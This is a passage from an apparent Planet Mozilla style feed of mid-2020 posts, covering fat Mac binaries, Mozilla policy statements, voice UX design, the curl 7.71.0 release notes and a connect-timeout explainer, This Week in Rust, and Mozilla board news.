But it's actually more amazing than that because you can have multiple subtypes. Besides generic PPC or PPC64, you can have binaries that run specifically on the G3 (ppc750), G4 (ppc7400 or ppc7450) or G5 (ppc970). The G5 subtype in particular can be 32-bit or 64-bit. I know this is possible because LAMEVMX is already a three-headed binary that selects the non-SIMD G3, AltiVec G4 or special superduper AltiVec G5 version at runtime from a single file. The main reason I don't do this in TenFourFox is that the resulting executable would be ginormous (as in over 500MB in size).
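For the record, the gluing itself is a short exercise with lipo – a minimal sketch, where the input files are hypothetical thin binaries that each have to be built separately, and where (as noted below) you may need to run lipo in stages on different toolchains because no single one knows every architecture listed:

# Combine separately built thin binaries into one fat binary, then inspect it
lipo -create hello-ppc750 hello-ppc7450 hello-ppc970 \
     hello-i386 hello-x86_64 hello-arm64 \
     -output hello-sdub
lipo -detailed_info hello-sdub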

But ARM has an even more dizzying array of subtypes, at least nine, and the Apple ARM in the new AARM Macs will probably be a special subtype of its own. This means that theoretically a Super Duper Universal Binary ("SDUB") could have all of the following:

  • ppc750
  • ppc7400
  • ppc7450
  • ppc970 (this would work for both 32-bit and 64-bit on the G5)
  • i386
  • x86_64
  • x86_64h (i.e., Haswell, here's an example, thanks Markus Stange for pointing this out)
  • armv4t
  • armv5
  • armv6
  • armv6m
  • armv7
  • armv7em
  • armv7k
  • armv7m
  • armv7s
  • whatever AARM Macs turn out to be

That's potentially a 17-way binary. The best part is that each individual subpart can link against a different Mac OS X/macOS SDK, so the PowerPC subportions could be linked against 10.4, the i386 subportion against anything from 10.4 through 10.6, the x86_64 subportion against 10.4 through 10.15 (+/- the Haswell subtype), the various weirdo ARM subportions against whatever macOS SDK is relevant to the corresponding iOS version, and the AARM Mac-specific subportion against 11.0. It may be necessary to lipo it together in multiple stages using multiple machines or Xcodes depending on which subtypes are known to that platform, but after you do that and code-sign and/or notarize, you should have the ultimate Super Duper Universal Binary, able to run on any of these systems. Now, there's a challenge for someone. I look forward to one of those Developer Transition Kits getting put to good use here.

The Mozilla BlogImmigrants Remain Core to the U.S.’ Strength

By its very design the internet has accelerated the sharing of ideas and information across borders, languages, cultures and time zones. Despite the awesome reach and power of what the web has enabled, there is still no substitute for the chemistry that happens when human beings of different backgrounds and experiences come together to live and work in the same community.

Immigration brings a wealth of diverse viewpoints, drives innovation and creative thinking, and is central to building the internet into a global public resource that is open and accessible to all.

This is why the current U.S. administration’s recent actions are so troubling. On June 22, 2020 President Donald Trump issued an Executive Order suspending entry of immigrants under the premise that they present a risk to the United States’ labor market recovery from the COVID-19 pandemic. This decision will likely have far-reaching and unintended consequences for industries like Mozilla’s and throughout the country.

Technology companies, including Mozilla, rely on brilliant minds from around the globe. This mix of people and ideas has generated significant technological advances that currently fuel our global economy and will undoubtedly be essential for future economic recovery and growth.

This is also why we’re eager to see lawmakers create a permanent solution for DACA (Deferred Action for Childhood Arrivals). We hope that in light of the recent U.S. Supreme Court ruling, the White House does not continue to pursue plans to end the program that currently protects about 700,000 young immigrants known as Dreamers from deportation. These young people were brought to the U.S. as minors, and raised and educated here. We’ve made this point before, but it bears repeating: Breaking the promise made to these young people and preventing these future leaders from having a legal pathway to citizenship is short-sighted and morally wrong. We owe it to them and to the country to give them every opportunity to succeed here in the U.S.

Immigrants have been a core part of the United States’ strength since its inception. A global pandemic hasn’t changed that. At a time when the United States is grappling with how to make right so many of the wrongs of its past, the country can’t afford to double down on policies that shut out diverse voices and contributions of people from around the world. As they have throughout the country’s history, our immigrant family members, friends, neighbors and colleagues must be allowed to continue playing a vital role in moving the U.S. forward.

The post Immigrants Remain Core to the U.S.’ Strength appeared first on The Mozilla Blog.

The Firefox FrontierCelebrate Pride with these colorful browser themes for Firefox

As June comes to a close, we wanted to share some of our favorite LGBTQ browser themes, so you can celebrate Pride well into the summer and beyond. Gay Pride … Read more

The post Celebrate Pride with these colorful browser themes for Firefox appeared first on The Firefox Frontier.

The Mozilla BlogWe’re proud to join #StopHateForProfit

Mozilla stands with the family of companies and civil society groups calling on Facebook to take strong action to limit hateful and divisive content on their platforms. Mozilla and Firefox have not advertised on Facebook and Instagram since March of 2018, when it became clear the company wasn’t acting to address the lack of user privacy that emerged in the Cambridge Analytica scandal.

This is a crucial time for democracy, and internet platforms must play a constructive role. That means protecting people’s privacy and not becoming a willing vehicle for misinformation, hate, and lies. Now is the time for action, and we call upon Facebook to be on the right side of history.

The post We’re proud to join #StopHateForProfit appeared first on The Mozilla Blog.

Firefox UXDesigning for voice

In the future people will use their voice to access the internet as often as they use a screen. We’re already in the early stages of this trend: As of 2016 Google reported 20% of searches on mobile devices used voice, last year smart speaker sales topped 146 million units — a 70% jump from 2018 — and I’m willing to bet your mom or dad has adopted voice to make a phone call or dictate a text message.

I’ve been exploring voice interactions as the design lead for Mozilla’s Emerging Technologies team for the past two years. In that time we’ve developed Pocket Listen (a Text-to-Speech platform, capable of converting any published web article into audio) and Firefox Voice (an experiment accessing the internet with voice in the browser). This blog post is an introduction to designing for voice, based on the lessons our team learned researching and developing these projects. Luckily, if you’re a designer transitioning to working with voice, and you already have a solid design process in place, you’ll find many of your skills transfer seamlessly. But, some things are very different, so let’s dive in.

The benefits of voice

As with any design it’s best to ground the work in the value it can bring people.

The accessibility benefits to a person with a physical impairment should be clear, but voice has the opportunity to aid an even larger population. Small screens are hard to read with aging eyes, typing on a virtual keyboard can be difficult, and understanding complex technology is always a challenge. Voice is emerging as a tool to overcome these limitations, turning cumbersome tasks into simple verbal interactions.

How can voice technology improve the user experience?

As designers, we’re often tasked with creating efficient and effortless interactions. Watch someone play music on a smart speaker and you’ll see how quickly thought turns to action when friction is removed. They don’t have to find and unlock their phone, launch an app, scroll through a list of songs and tap. Requesting a song happens in an instant with voice. A quote from one of our survey respondents summed it up perfectly:

“Being able to talk without thinking. It’s essentially effortless information ingestion.“

When is voice valuable?

When and where voice is likely to be used

Talking out loud to a device isn’t always appropriate or socially acceptable. We see this over and over again in research and real world usage. People are generally uncomfortable talking to devices in public. The more private, the better.

Graph showing Home, In the car, and At a friends house being the top 3 places people are comfortable using voice.

Hands-free and multi-tasking also drive voice usage — cooking, washing the dishes, or driving in a car. These situations present opportunities to use voice because our hands or eyes are otherwise occupied.

But, voice isn’t just used for giving commands. Text-to-Speech can generate content from anything written, including articles. It’s a technology we successfully used to build and deploy Pocket Listen, which allows you to listen to articles you’d saved for later.

Pocket Listen usage Feb 2020, United Kingdom

In the graph above you’ll see that people primarily use Pocket Listen while commuting. By creating a new format to deliver the content, we’ve expanded when and where the product provides value.

Why is designing for voice hard?

Now that you know ‘why’ and ‘when’ voice is valuable, let’s talk about what makes it hard. These are the pitfalls to watch for when building a voice product.

What’s hard about designing for voice?

Voice is still a new technology, and, as such, it can feel open ended. There’s a wide variety of uses and devices it works well with. It can be incorporated using input (Speech-to-Text) or output (Text-to-Speech), with a screen or without a screen. You may be designing with a “Voice first mindset” as Amazon recommends for the Echo Show, or the entire experience might unfold while the phone is buried in someone’s pocket.

In many ways, this kind of divergence is familiar if you’ve worked with mobile apps or responsive design. Personally, the biggest adjustment for me has been the infinite nature of voice. The limited real estate of a screen imposes constraints on the number and types of interactions available. With voice, there’s often no interface to guide an action and it’s more personal than a screen, so request and utterance vary greatly by personality and culture.

In a voice user interface, a person can ask anything and they can ask it a hundred different ways. A list is a great example: on a screen it’s easy to display a handful of options. In a voice interface, listing more than two options quickly breaks down. The user can’t remember the first choice or the exact phrasing they should say if they want to make a selection.

Which brings us to discovery — often cited as the biggest challenge facing voice designers and developers. It’s difficult for a user to know what features are available, what they can say, and how they have to say it. It becomes essential to teach a system’s capabilities, but that is difficult in practice. Even when you teach a few key phrases early in the experience, human recall of proper voice commands and syntax is limited. People rarely remember more than a few phrases.

The exciting future of voice

It’s still early days for voice interactions and while the challenges are real, so are the opportunities. Voice brings the potential to deliver valuable new experiences that improve our connections to each other and the vast knowledge available on the internet. These are just a few examples of what I look forward to seeing more of:

“I like that my voice is the interface. When the assistant works well, it lets me do what I wanted to do quickly, without unlocking my phone, opening an app / going on my computer, loading a site, etc.“

As you can see, we’re at the beginning of an exciting journey into voice. Hopefully this intro has motivated you to dig deeper and ask how voice can play a role in one of your projects. If you want to explore more, have questions or just want to chat feel free to get in touch.

Hacks.Mozilla.OrgMozilla WebThings Gateway Kit by OKdo

We’re excited about this week’s news from OKdo, highlighting a new kit built around Mozilla’s WebThings Gateway. OKdo is a UK-based global technology company focused on IoT offerings for hobbyists, educators, and entrepreneurs. Their idea is to make it easy to get a private and secure “web of things” environment up and running in either home or classroom. OKdo chose to build this kit around the Mozilla WebThings Gateway, and we’ve been delighted to work with them on it.

The WebThings Gateway is an open source software distribution focused on privacy, security, and interoperability. It provides a web-based user interface to monitor and control smart home devices, along with a rules engine to automate them. In addition, a data logging subsystem monitors device changes over time. Thanks to extensive contributions from our open source community, you’ll find an add-on system to extend the gateway with support for a wide range of existing smart home products.

With the WebThings Gateway, users always have complete control. You can directly monitor and control your home and devices over the web. In fact, you’ll never have to share data with a cloud service or vendor. This diagram of our architecture shows how it works:

A diagram comparing the features of Mozilla IoT privacy with a more typical cloud-based IoT approach

Mozilla WebThings Gateway Kit details

The Mozilla WebThings Gateway Kit, available now from OKdo, includes:

  • Raspberry Pi 4 and case
  • MicroSD card pre-flashed with Mozilla WebThings Gateway software
  • Power supply
  • “Getting Started Guide” to help you easily get your project up and running

an image of the OKdo Mozilla WebThings Kit

You can find out more about the OKdo kit and how to purchase it for either home or classroom from their website.

To learn more about WebThings, visit Mozilla’s IoT website or join in the discussion on Discourse. WebThings is completely open source. All of our code is freely available on GitHub. We would love to have you join the community by filing issues, fixing bugs, implementing new features, or adding support for new devices. Also, you can help spread the word about WebThings by giving talks at conferences or local maker groups.

The post Mozilla WebThings Gateway Kit by OKdo appeared first on Mozilla Hacks - the Web developer blog.

Daniel Stenbergcurl 7.71.0 – blobs and retries

Welcome to the “prose version” of the curl 7.71.0 change log. It’s just been eight short weeks since I last blogged about a curl release, but here we are again and there’s quite a lot to say about this new one.

Presentation

Numbers

the 192nd release
4 changes
56 days (total: 8,132)

136 bug fixes (total: 6,209)
244 commits (total: 25,911)
0 new public libcurl function (total: 82)
7 new curl_easy_setopt() option (total: 277)

1 new curl command line option (total: 232)
59 contributors, 33 new (total: 2,202)
33 authors, 17 new (total: 803)
2 security fixes (total: 94)
1,100 USD paid in Bug Bounties

Security

CVE-2020-8169 Partial password leak over DNS on HTTP redirect

This is a nasty bug in user credential handling when doing authentication and HTTP redirects, which can lead to a part of the password being prepended to the host name when doing name resolving, thus leaking it over the network and to the DNS server.

This bug was reported and we fixed it in public – and then someone else pointed out the security angle of it! It just shows my lack of imagination. As a result, even though this was a bug already reported – and fixed – and therefore technically not eligible for a bug bounty, we decided to still reward the reporter, just maybe not with the full amount it would otherwise have received. We awarded the reporter 400 USD.

CVE-2020-8177 curl overwrite local file with -J

When curl -J is used it doesn’t work together with -i, and there’s a check that prevents the combination from being used. The check was flawed and could be circumvented, with the effect that a server providing a file name in a Content-Disposition: header could overwrite a local file, since the check for an existing local file was done in the code for receiving a body – as -J with -i wasn’t supposed to work… We awarded the reporter 700 USD.

Changes

We’re counting four “changes” this release.

CURLSSLOPT_NATIVE_CA – this is a new (experimental) flag that allows libcurl on Windows, when built to use OpenSSL, to use the Windows native CA store when verifying server certificates. See CURLOPT_SSL_OPTIONS. This option is marked experimental as we didn’t decide in time exactly how this new ability should relate to the existing CA store path options, so if you have opinions on this you know we’re interested!

CURLOPT_*_BLOB – a new series of certificate-related options has been added to libcurl. They all take blobs as arguments, which are basically just a memory area with a given size. These new options add the ability to provide certificates to libcurl entirely in memory without using files. See for example CURLOPT_SSLCERT_BLOB.

CURLOPT_PROXY_ISSUERCERT – turns out we were missing the proxy version of CURLOPT_ISSUERCERT so this completed the set. The proxy version is used for HTTPS-proxy connections.

--retry-all-errors is the new blunt tool of retries. It tells curl to retry the transfer for all and any errors that might occur. It’s for the cases where just --retry isn’t enough: when you know the transfer should work and that retrying can get it through.
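A minimal sketch (the URL is a placeholder): combined with --retry, it keeps hammering away at an endpoint you know should eventually work.

curl --retry 5 --retry-all-errors -O https://example.com/flaky.tar.gz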

Interesting bug-fixes

This is yet another release with over a hundred and thirty different bug-fixes. Of course all of them have their own little story to tell but I need to filter a bit to be able to do this blog post. Here are my collected favorites, in no particular order…

  • Bug-fixed happy eyeballs – turns out the happy eyeballs algorithm for doing parallel dual-stack connections (also for QUIC) still had some glitches…
  • Curl_addrinfo: use one malloc instead of three – another little optimize memory allocation step. When we allocate memory for DNS cache entries and more, we now allocate the full struct in a single larger allocation instead of the previous three separate smaller ones. Another little cleanup.
  • options-in-versions – this is a new document shipped with curl, listing exactly which curl version added each command line option that exists today. Should help everyone who wants their curl-using scripts to work on their uncle’s ancient setup.
  • dynbuf – we introduced new internal generic dynamic buffer functions to take care of dynamic buffers, growing and shrinking them. We basically simplified and reduced the number of different implementations into a single one with better checks and stricter controls. The internal API is documented.
  • on macOS avoid DNS-over-HTTPS when given a numerical IP address – this bug made for example FTP using DoH fail on macOS. The reason this is macOS-specific is that it is the only OS on which we call the name resolving functions even for numerical-only addresses.
  • http2: keep trying to send pending frames after req.upload_done – HTTP/2 turned 5 years old in May 2020 but we can still find new bugs. This one was a regression that broke uploads in some conditions.
  • qlog support – for the HTTP/3 cowboys out there. This makes curl generate QUIC related logs in the directory specified with the environment variable QLOGDIR (see the example after this list).
  • OpenSSL: have CURLOPT_CRLFILE imply CURLSSLOPT_NO_PARTIALCHAIN – another regression that had broken CURLOPT_CRLFILE. Two steps forward, one step back.
  • openssl: set FLAG_TRUSTED_FIRST unconditionally – with this flag set unconditionally curl works around the issue with OpenSSL versions before 1.1.0 when it would have problems if there are duplicate trust chains and one of the chains has an expired cert. The AddTrust issue.
  • fix expected length of SOCKS5 reply – my recent SOCKS overhaul and improvements brought this regression with SOCKS5 authentication.
  • detect connection close during SOCKS handshake – the same previous overhaul also apparently made the SOCKS handshake logic not correctly detect closed connection, which could lead to busy-looping and using 100% CPU for a while…
  • add https-proxy support to the test suite – Finally it happened. And a few new test cases for it was also then subsequently provided.
  • close connection after excess data has been read – a very simple change that begged the question why we didn’t do it before! If a server provides more data than what it originally told it was gonna deliver, the connection is marked for closure and won’t be re-used. Such a re-use would usually just fail miserably anyway.
  • accept “any length” credentials for proxy auth – we had some old limits of 256 byte name and password for proxy authentication lingering for no reason – and yes a user ran into the limit. This limit is now gone and was raised to… 8MB per input string.
  • allocate the download buffer at transfer start – just a more clever way to allocate (and free) the download buffers, to only have them around when they’re actually needed and not longer. Helps reduce the amount of run-time memory curl needs and uses.
  • accept “::” as a valid IPv6 address – the URL parser was a tad bit too strict…
  • add SSLKEYLOGFILE support for wolfSSL – SSLKEYLOGFILE is a lovely tool to inspect curl’s TLS traffic. Now also available when built with wolfSSL.
  • enable NTLM support with wolfSSL – yeps, as simple as that. If you build curl with wolfSSL you can now play with NTLM and SMB!
  • move HTTP header storage to Curl_easy from connectdata – another one of those HTTP/2 related problems that surprised me still was lingering. Storing request-related data in the connection-oriented struct is a bad idea as this caused a race condition which could lead to outgoing requests with mixed up headers from another request over the same connection.
  • CODE_REVIEW: how to do code reviews in curl – thanks to us adding this document, we could tick off the final box and we are now at gold level
  • leave the HTTP method untouched in the set.* struct – when libcurl was told to follow an HTTP redirect and the response code would tell libcurl to change the method, that new method would be set in the easy handle in a way so that if the handle was re-used at that point, the updated and not the original method would be used – contrary to documentation and how libcurl otherwise works.
  • treat literal IPv6 addresses with zone IDs as a host name – the curl tool could mistake a given numerical IPv6 address with a “zone id” containing a dash as a “glob” and return an error instead…
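To try the qlog support mentioned in the list above – assuming a curl built with the experimental HTTP/3 backend enabled, and with the URL swapped for an HTTP/3-capable server – something like this should leave qlog files behind for the QUIC connection:

mkdir -p /tmp/qlog
QLOGDIR=/tmp/qlog curl --http3 https://example.com/ -o /dev/null
ls /tmp/qlog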

Coming up

There are more changes coming and some PR are already pending waiting for the feature window to open. Next release is likely to become version 7.72.0 and have some new features. Stay tuned!

The Firefox FrontierFirefox Relay protects your email address from hackers and spammers

Firefox Relay is a smart, easy solution that can preserve the privacy of your email address, much like a post office box for your physical address. When a form requires … Read more

The post Firefox Relay protects your email address from hackers and spammers appeared first on The Firefox Frontier.

About:CommunityFirefox 78 new contributors

With the release of Firefox 78, we are pleased to welcome the 34 developers who contributed their first code change to Firefox in this release, 28 of whom were brand new volunteers! Please join us in thanking each of these diligent and enthusiastic individuals, and take a look at their contributions:

Mozilla Future Releases BlogUpdate on Firefox Support for macOS 10.9, 10.10 and 10.11

On June 30th, macOS 10.9, 10.10 and 10.11 users will automatically be moved to the Firefox Extended Support Release (ESR).

While Apple doesn’t have an official policy governing security updates for older macOS releases, their ongoing practice has been to support the most recent three releases (i.e. version N, N-1, and N-2). The last security update applicable to macOS 10.11 was made available nearly 2 years ago in July 2018 (https://support.apple.com/en-us/HT201222). Unsupported operating systems receive no security updates, have known exploits, and can be dangerous to use, which makes it difficult and less than optimal to maintain Firefox for those versions.

Users do not need to take additional action to receive those updates. On June 30th, these macOS users will automatically be moved to the ESR channel through application update.

In the meantime, we strongly encourage our users to upgrade to macOS 10.12 or higher to benefit from the security and privacy updates.

For more information please visit the Firefox support page.

The post Update on Firefox Support for macOS 10.9, 10.10 and 10.11 appeared first on Future Releases.

Hacks.Mozilla.OrgWelcoming Safari to the WebExtensions Community

Browser extensions provide a convenient and powerful way for people to take control of how they experience the web. From blocking ads to organizing tabs, extensions let people solve everyday problems and add whimsy to their online lives.

At yesterday’s WWDC event, Apple announced that Safari is adopting a web-based API for browser extensions similar to Firefox’s WebExtensions API. Built using familiar web technologies such as JavaScript, HTML, and CSS, the API makes it easy for developers to write one code base that will work in Firefox, Chrome, Opera, and Edge with minimal browser-specific changes. We’re excited to see expanded support for this common set of browser extension APIs.

What this means for you

Interested in porting your browser extension to Safari? Visit MDN to see which APIs are currently supported. Developers can start testing the new API in Safari 14 using the seed build for macOS Big Sur. The API will be available in Safari 14 on macOS Mojave and macOS Catalina in the future.

Or, maybe you’re new to browser extension development. Check out our guides and tutorials to learn more about the WebExtensions API. Then, visit Firefox Extension Workshop to find information about development tools, security best practices, and tips for creating a great user experience. Be sure to take a look at our guide for how to build a cross-browser extension.

Ready to share your extension with the world (or even just a few friends!)? Our documentation will guide you through the process of making your extension available for Firefox users.

Happy developing!

The post Welcoming Safari to the WebExtensions Community appeared first on Mozilla Hacks - the Web developer blog.

Daniel Stenbergcurl ootw: --connect-timeout

Previous options of the week.

--connect-timeout [seconds] was added in curl 7.7 and has no short option version. The number of seconds for this option can (since 7.32.0) be specified using decimals, like 2.345.

How long to allow something to take?

curl shipped with support for the -m option already from the start. That limits the total time a user allows the entire curl operation to spend.

However, if you’re about to do a large file transfer and you don’t know how fast the network will be, how do you know how much time to allow the operation to take? In a lot of situations, you then end up basically adding a huge margin. Like:

This operation usually takes 10 minutes, but what if everything is super overloaded at the time, let’s allow it 120 minutes to complete.

Nothing really wrong with that, but sometimes you end up noticing that something in the network or the remote server just dropped the packets and the connection wouldn’t even complete the TCP handshake within the given time allowance.

If you want your shell script to loop and try again on errors, spending 120 minutes for every lap makes it a very slow operation. Maybe there’s a better way?

Introducing the connect timeout

To help combat this problem, the --connect-timeout is a way to “stage” the timeout. This option sets the maximum time curl is allowed to spend on setting up the connection. That involves resolving the host name, connecting TCP and doing the TLS handshake. If curl hasn’t reached its “established connection” state before the connect timeout limit has been reached, the transfer will be aborted and an error is returned.

This way, you can for example allow the connect procedure to take no more than 21 seconds, but then allow the rest of the transfer to go on for a total of 120 minutes if the transfer just happens to be terribly slow.

Like this:

curl --connect-timeout 21 --max-time 7200 https://example.com
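Tying this back to the retry-loop scenario above: with a short connect timeout each failed lap is cheap, while a working-but-slow transfer still gets its full time allowance. A minimal sketch, with placeholder URL and numbers:

# Retry until the download succeeds; a dead network fails within ~5 seconds
# per attempt instead of eating the whole two-hour budget
until curl --connect-timeout 5 --max-time 7200 -O https://example.com/file; do
  sleep 30
done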

Sub-second

You can even set the connection timeout to be less than a second (with the exception of some special builds that aren’t very common) with the use of decimals.

Require the connection to be established within 650 milliseconds:

curl --connect-timeout 0.650 https://example.com

Just note that DNS, TCP and local network conditions at the moment you run this command line may vary greatly, so restricting the connection time this much may have the effect that it sometimes aborts a connection a little too easily. Just beware.

A connection that stalls

If you prefer a way to detect and abort transfers that stall after a while (but maybe long before the maximum timeout is reached), you might want to look into using --speed-limit.

Also, if a connection goes down to zero bytes/second for a period of time, as in it doesn’t send any data at all, and you still want your connection and transfer to survive that, you might want to make sure that you have your --keepalive-time set correctly.
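
As a rough sketch of those two situations (the numbers below are arbitrary examples, not recommendations): abort the transfer if it stays slower than 1000 bytes per second for 30 seconds,

curl --speed-limit 1000 --speed-time 30 https://example.com

or send TCP keepalive probes after 60 seconds of idleness so that a quiet but wanted connection is less likely to get torn down along the way:

curl --keepalive-time 60 https://example.com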

This Week In RustThis Week in Rust 344

Hello and welcome to another issue of This Week in Rust! Rust is a systems language pursuing the trifecta: safety, concurrency, and speed. This is a weekly summary of its progress and community. Want something mentioned? Tweet us at @ThisWeekInRust or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Check out this week's This Week in Rust Podcast

Updates from Rust Community

News & Blog Posts

Crate of the Week

This week's crate is diskonaut, a disk usage explorer.

Thanks to Aram Drevekenin for the suggestion!

Submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but didn't know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from Rust Core

325 pull requests were merged in the last week

Rust Compiler Performance Triage

  • 2020-06-23. Lots of improvements this week, and no regressions, which is good. But we regularly see significant performance effects on rollups, which is a concern.

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

No RFCs were approved this week.

Final Comment Period

Every week the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs

No RFCs are currently in the final comment period.

Tracking Issues & PRs

New RFCs

Upcoming Events

Online
North America
Asia Pacific

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Rust Jobs

Tweet us at @ThisWeekInRust to get your job offers listed here!

Quote of the Week

Rust's beauty lies in the countless decisions made by the development community that constantly make you feel like you can have ten cakes and eat all of them too.

Jake McGinty et al on the tonari blog

Thanks to llogiq for the suggestions!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, and cdmistman.

Discuss on r/rust

Cameron KaisermacOS Big Unsure

Finally, Mac OS X goes to 11 with macOS Big Sur. In keeping with Apple's name selection from wildly inappropriate California landmarks, in just three versions you can go from a dusty, hostile desert to an expensive, cramped island and now steep cliffs with rugged beauty as your car goes off a substandard bridge into the Pacific Ocean.

But there's no doubt that Apple's upcoming move to ARM across all its platforms, or at least Apple's version of ARM (let's call it AARM), makes supreme business sense. And ARM being the most common RISC-descended architecture on the planet right now, it's a bittersweet moment for us Power Mac luddites (the other white meat) to see the Reality Distortion Field reject, embrace and then reject x86 once again.

Will AARM benefit Apple? You bet it will. Apple still lives in the shadow of Steve Jobs who always wanted the Mac to be an appliance, and now that Apple controls almost all of the hardware down to the silicon, there's no reason they won't do so. There's certainly benefit to the consumer: Big Sur is going to run really well on AARM because Apple can do whatever hardware tweaks, add whatever special instructions, you name it, to make the one OS the new AARM systems will run as fast and energy-efficient as possible (ironically done with talent from P. A. Semi, who was a Power ISA licensee before Apple bought them out). In fact, it may be the only OS they'll be allowed to run, because you can bet the T2 chip will be doing more and more essential tasks as application-specific hardware adds new functionality where Moore's law has failed. But the biggest win is for Apple themselves, who are no longer hobbled by Intel or IBM's respective roadmaps, and because their hardware will be sui generis will confound any of the attempts at direct (dare I say apples to apples) performance comparisons that doomed them in the past. AARM Macs will be the best machines in their class because nothing else will be in their class.

There's the darker side, too. With things like Gatekeeper, notarization and System Integrity Protection Apple has made it clear they don't want you screwing around with their computers. But the emergence of AARM platforms means Apple doesn't have to keep having the OS itself slap your hand: now the development tools and hardware can do it as well. The possibilities for low-level enforcement of system "security" policies are pretty much limitless if you even control the design of the CPU.

I might actually pick up a low-end one to play with, since I'm sort of a man without a portable platform now that my daily driver is a POWER9 (I have a MacBook Air which I tolerate because battery life, but Mojave Forever, and I'll bet runtime on these machines will be stupendous). However, the part that's the hardest to digest is that the AARM Mac, its hardware philosophy being completely unlike its immediate predecessors, is likely to be more Mac-like than any Mac that came before it save the Compact Macs. After all, remember that Jobs always wanted the Mac to be an appliance. Now, Tim Cook's going to sell you one.

The Mozilla BlogNavrina Singh Joins the Mozilla Foundation Board of Directors

Today, I’m excited to welcome Navrina Singh as a new member of the Mozilla Foundation Board of Directors. You can see comments from Navrina here.

Navrina is the Co-Founder of Credo AI, an AI Fund company focused on auditing and governing Machine Learning. She is the former Director of Product Development for Artificial Intelligence at Microsoft. Throughout her career she has focused on many aspects of business, including start-up ecosystems, diversity and inclusion, and the development of frontier technologies and products. This breadth of experience is part of the reason she’ll make a great addition to our board.

In early 2020, we began focusing in earnest on expanding Mozilla Foundation’s board. Our recruiting efforts have been geared towards building a diverse group of people who embody the values and mission that bring Mozilla to life and who have the programmatic expertise to help Mozilla, particularly in artificial intelligence.

Since January, we’ve received over 100 recommendations and self-nominations for possible board members. We ran all of the names we received through a desk review process to come up with a shortlist. After extensive conversations, it is clear that Navrina brings the experience, expertise and approach that we seek for the Mozilla Foundation Board.

Prior to working on AI at Microsoft, Navrina spent 12 years at Qualcomm, where she held roles across engineering, strategy and product management. In her last role as the head of Qualcomm’s technology incubator ‘ImpaQt’, she worked with early start-ups in machine intelligence. Navrina is a Young Global Leader with the World Economic Forum and has previously served on the industry advisory board of the University of Wisconsin-Madison College of Engineering, as well as the boards of Stella Labs, Alliance for Empowerment and the Technology Council for FIRST Robotics.

Navrina has been named one of Business Insider’s Top Americans changing the world, and her work in Responsible AI has been featured in FORTUNE, Geekwire and other publications. For the past decade she has been thinking critically about the way AI and other emerging technologies impact society. That work included a non-profit initiative called Marketplace for Ethical and Responsible AI Tools (MERAT) focused on building, testing and deploying AI responsibly. It was through this last bit of work that Navrina was introduced to our work at Mozilla. This experience will help inform Mozilla’s own work in trustworthy AI.

We also emphasized throughout this search a desire for more global representation. And while Navrina is currently based in the US, she has a depth of experience partnering with and building relationships across important markets – including China, India and Japan. I have no doubt that this experience will be an asset to the board. Navrina believes that technology can open doors, offering huge value to education, economies and communities in both the developed and developing worlds.

Please join me in welcoming Navrina Singh to the Mozilla Foundation Board of Directors.

PS. You can read Navrina’s message about why she’s joining Mozilla here.

Background:

Twitter: @navrina_singh

LinkedIn: https://www.linkedin.com/in/navrina/

The post Navrina Singh Joins the Mozilla Foundation Board of Directors appeared first on The Mozilla Blog.

The Mozilla BlogWhy I’m Joining the Mozilla Board

Firefox was my window into Mozilla 15 years ago, and it’s through this window I saw the power of an open and collaborative community driving lasting change. My admiration and excitement for Mozilla was further bolstered in 2018, when Mozilla made key additions to its Manifesto to be more explicit about its mission to guard the open nature of the internet. For me this addendum signalled an actionable commitment to promote equal access to the internet for ALL, irrespective of demographic characteristics. Growing up in a resource-constrained India in the nineties with limited access to global opportunities, this precise mission truly resonated with me.

Technology should always be in service of humanity – an ethos that has guided my life as a technologist, as a citizen and as a first-time co-founder of Credo.ai. Over the years, I have seen the deepened connection between my values and Mozilla’s commitment. I had come to Mozilla as a user for the secure, fast and open product, but I stayed because of this alignment of missions. And today, I’m very honored to join Mozilla’s Board.

Growing up in India, having worked globally and lived in the United States for the past two decades, I have witnessed firsthand the power of informed communities and transparent technologies to drive innovation and change. It is my belief that true societal transformation happens when we empower our people and give them the right tools and the agency to create. Since its infancy Mozilla has enabled exactly that, by creating an open internet that serves people first, where individuals can shape their own empowered experiences.

Though I am excited about all the areas of Mozilla’s impact, I joined the Mozilla board to strategically support the leaders in Mozilla’s next frontier: supporting its theory of change for pursuing more trustworthy Artificial Intelligence.

Mozilla has, from the beginning, rejected the idea of the black box by creating a transparent and open ecosystem, making visible all the inner workings and decision-making within its organizations and products. I am beyond excited to see that this is the same mindset (of transparency and accountability) that Mozilla’s leaders are bringing to their initiatives in trustworthy Artificial Intelligence (AI).

AI is a defining technology of our times which will have a broad impact on every aspect of our lives. Mozilla is committed to mobilizing public awareness and demand for more responsible AI technology especially in consumer products. In my new role as a Mozilla Foundation Board Member, I am honored to support Mozilla’s AI mission, its partners and allies around the world to build momentum for a responsible and trustworthy digital world.

Today the world crumbles under the weight of multiple pandemics – racism, misinformation, coronavirus – powered and resolved by people and technology. Now more than ever the internet and technology need to bring equal opportunity, verifiable facts, human dignity, individual expression and collaboration among diverse communities to serve humanity. Mozilla has championed these tenets and brought about change for decades. Now with its frontier focus on trustworthy AI, I am excited to see the continued impact it brings to our world.

We are at a transformational intersection in our lives where we need to critically examine and explore our choices around technology to serve our communities. How can we build technology that is demonstrably worthy of trust? How can we empower people to design systems for transparency and accountability? How can we check the values and biases we are bringing to building this fabric of frontier technology? How can we build diverse communities to catalyze change? How might we build something better, a better world through responsible technology? These questions have shaped my journey. I hope to bring this learning mindset and informed action in service of the Mozilla board and its trustworthy AI mission.

The post Why I’m Joining the Mozilla Board appeared first on The Mozilla Blog.

Daniel Stenbergwebinar: testing curl for security

Alternative title: “testing, Q&A, CI, fuzzing and security in curl”

June 30 2020, at 10:00 AM Pacific Time (17:00 GMT, 19:00 CEST).

Time: 30-40 minutes

